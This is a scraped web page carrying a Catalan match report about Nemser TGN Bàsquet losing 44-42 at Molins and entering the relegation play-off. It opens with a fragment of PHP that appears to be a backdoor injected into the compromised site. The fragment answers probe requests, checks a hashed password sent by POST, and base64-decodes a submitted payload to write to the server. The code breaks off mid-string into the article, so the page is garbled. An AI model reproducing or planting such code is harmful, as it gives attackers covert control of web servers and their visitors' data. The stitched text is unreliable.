function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet perd a la pista del Molins i jugarà el 'play-off' de descens (44-42) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet perd a la pista del Molins i jugarà el ‘play-off’ de descens (44-42)

Updated: maig 11, 2014

El Nemser TGN Bàsquet jugarà el play-off de descens per no baixar a la segona catalana després de perdre amb el Molins en un partit marcat per les defenses d’ambdós equips. El conjunt lila, que va sobreposar-se a un mal inici, va tornar a caure en un final ajustat -l’enèsim- i va tirar per terra la bona feina feta durant tot el matx. A falta d’una jornada, l’equip que entrena Juan Carlos Arjona, només espera conèixer rival, que sortirà d’entre el Torelló o el Sant Celoni de l’altre grup. El sistema serà un play-off al millor de tres partits i el Nemser TGN Bàsquet tindrà el factor pista a casa (jugarà el primer i el tercer matx, si fos necessari, al pavelló del Sagrat Cor).

El matx va començar molt malament per les noies del TGN Bàsquet. El Molins, un equip més fort físicament dins la zona, va jugar molt còmode en atac, amb un bon balanç exterior-interior. Així, el primer quart va acabar amb avantatge per les locals (20-14), una diferència que es va anar fent gran en el segon quart (25-16) per arribar als 8 punts de desavantatge al descans (30-22). Les alternatives defensives del Molins col·lapsaven els atacs del conjunt tarragoní, especialment contra la zona 2-3 perquè l’envergadura de les rivals feia que l’ampolla fos un terreny gairebé prohibit per les visitants.

Poc a poc, però, el Nemser TGN Bàsquet va anar recuperant terreny. La intensitat defensiva de l’equip d’Arjona, una de les seves millors armes durant tot el curs, va fer efecte i el Molins tenia molts problemes per encistellar. El matx va esdevenir un duel defensiu de primer ordre i el tercer període va enregistrar un parcial de 3-7. El quart i definitiu període estava completament obert. El conjunt lila s’anava fent l’amo del matx i, arrecerat en la solidesa defensiva, va capgirar el resultat (35-36 a 4:55 del final), i va deixar el Molins sense anotar en els primers 7 minuts d’aquest quart. El Nemser TGN Bàsquet va gaudir d’avantatges de fins a 5 punts (35-40) però, a partir d’aquests moments, els nervis van fer acte de presència. Així, les visitants es van bloquejar, van perdre pilota rere pilota i van ressucitar un rival, el Molins, que semblava que ja no tindria cap possibilitat per guanyar. A falta d’1:13 pel final, el Nemser guanyava d’un punt (41-42). El Molins, però, va capgirar el resultat (43-42) i, a falta de 24 segons, l’equip lila va desaprofitar un atac. Va perdre una pilota, va fer falta per forçar els tirs lliures -el Molins només en va anotar un- i, en l’última possessió, de 13 segons, va tenir un llançament triple per guanyar el partit, que va fallar. El play-off de descens espera.